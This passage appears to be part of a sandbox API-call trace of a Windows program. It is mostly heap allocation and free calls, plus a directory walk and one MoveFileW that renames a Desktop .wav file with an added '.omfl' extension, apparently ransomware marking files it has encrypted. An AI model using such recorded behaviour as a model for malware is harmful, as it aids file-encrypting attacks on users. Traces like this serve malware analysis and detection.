CloseHandle (hObject=0x610) returned 1 [0131.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0131.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8a0) returned 0x74fb288 [0131.933] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\W 4QcV_lOpjk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\w 4qcv_lopjk.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\W 4QcV_lOpjk.wav.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\w 4qcv_lopjk.wav.omfl")) returned 1 [0131.934] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85d77510, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0xe07dd9c0, ftLastAccessTime.dwHighDateTime=0x1d5d8fc, ftLastWriteTime.dwLowDateTime=0xe07dd9c0, ftLastWriteTime.dwHighDateTime=0x1d5d8fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_117G", cAlternateFileName="")) returned 1 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e6a0 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2cd0 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0131.935] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85d77510, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0xe07dd9c0, ftLastAccessTime.dwHighDateTime=0x1d5d8fc, ftLastWriteTime.dwLowDateTime=0xe07dd9c0, ftLastWriteTime.dwHighDateTime=0x1d5d8fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_117G", cAlternateFileName="")) returned 0 [0131.935] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0131.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0131.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2b90 | out: hHeap=0x4970000) returned 1 [0131.935] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0131.935] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 